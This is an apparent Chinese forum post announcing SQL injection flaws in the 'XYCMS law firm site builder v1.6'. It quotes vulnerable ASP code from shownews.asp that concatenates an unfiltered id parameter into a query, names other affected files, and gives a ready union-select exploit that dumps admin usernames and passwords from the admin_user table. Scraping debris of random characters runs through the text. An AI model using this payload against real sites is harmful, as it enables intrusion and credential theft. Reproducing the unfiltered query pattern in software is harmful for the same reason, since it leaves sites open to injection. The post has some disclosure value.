前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似3 f: A' V, e% [5 z, z4 `: A$ S
# W3 h4 E7 }/ U( l
淫荡分割线
+ M3 ?3 x5 x+ Y$ A5 M7 B& o" l. Q--------------------------------------------------------& h( Y0 c% A4 p+ f8 G8 C O
" m! d6 g+ B# d9 p审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)2 I( n4 s! T. B8 o
源码地址:http://down.chinaz.com/soft/29233.htm
- X* O1 d" D$ ~% d
3 E `' @2 H) w5 R; d漏洞文件:shownews.asp' N/ M9 \0 A; R, D
漏洞代码:7-13行% s" [! G* L9 o8 R4 P
4 j/ Z& Q9 I7 I3 |: U/ U$ P0 e# s- c # X9 X X( p$ a. C! e& |
<%
/ j2 p2 t }$ v" ]( f% Q6 J6 _id=request.QueryString("id")
! p, P8 x4 X6 O) }5 h5 ^0 `
) }# K8 |3 D0 W! S( ?* oset snews=server.createobject("adodb.recordset")
0 w- |. S0 A' b" u8 n; mexec="select * from [news] where id="&id
: O9 ^/ ^% t( J9 Hsnews.open exec,conn,1,1
7 B9 O/ v, A8 u3 U$ y- ~%>( W U3 r5 E3 n$ d& o
0 f6 U7 Y4 x' y4 A0 t! l ]
4 j, d, P8 ~' Z0 b/ X
什么过滤都没有 直造成注入7 d) C& n6 s: w4 [, ]5 w c
$ F% x0 A; z" w! w: b/ ^
注入点:http://127.0.0.1:99/shownews.asp?id=xx7 v5 ]2 J5 r, ?. ?2 W, }$ c, ~
1 v' c3 R6 l) Z, O其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
) \$ q& g* x7 Z: a! ~. p
% l: z8 E9 H" m; m$ s 4 z$ F ]5 A4 S. G4 Q* d* G- `6 j
exp: union select 1,admin,password,4,5,7 from admin_user+ ?9 A6 w6 m) R. y" c% \1 j
% T6 J2 W, M; w% n4 ?9 e+ ]
|